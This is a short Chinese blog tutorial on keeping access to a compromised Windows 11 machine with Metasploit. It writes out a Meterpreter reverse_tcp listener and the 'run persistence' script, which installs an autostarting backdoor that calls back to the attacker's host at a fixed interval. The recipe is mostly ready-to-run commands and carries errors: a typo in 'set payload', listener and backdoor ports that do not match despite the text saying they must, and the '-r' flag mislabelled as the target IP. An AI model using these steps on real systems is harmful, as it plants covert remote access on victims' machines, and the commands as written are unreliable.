浅谈Msfconsole持久话(一)

我们在利用msfconsole获取系统权限后。若系统进行了关机或者重启,我们与目标建立联系就显得很困难。于是我们需要想办法达到“持久化”效果。本文简单的介绍msf自带脚本与目标达到持久化效果。

实验环境

  • kali Linux(攻击者)
  • Win11 (受害者)

获取系统Shell

我们利用msf先通过攻击获取一个 meterpreter shell

msfpc windows

配置监听

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 443
run -j

配置完成后,运行目标程序。如下成功得到shell

持久化

1.获得 meterpreter shell 之后,输入

run persistence -A -S -U -i 5 -p 5555 -r 192.168.50.84

命令语法:

  • -A:自动启动Payload程序

  • -S:系统登录时自动加载

  • -U:用户登录时自动启动

  • -X:开机时自动加载

  • -i:回连的时间间隔

  • -P:监听反向连接端口号

  • -r:目标机器 IP 地址(攻击主机)

执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启。kali输入

use exploit/multi/handler
et payload windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 4444(端口要和上面的persistence后门端口一致)
run

这样,即使重新启动计算机,此时使用计算机将允许自动重新与目标系统建立连接, 不必每次都需要进行配置才能取得shell。

更多精彩文章 欢迎关注我们

防失联  关注我

请使用浏览器的分享功能分享到微信等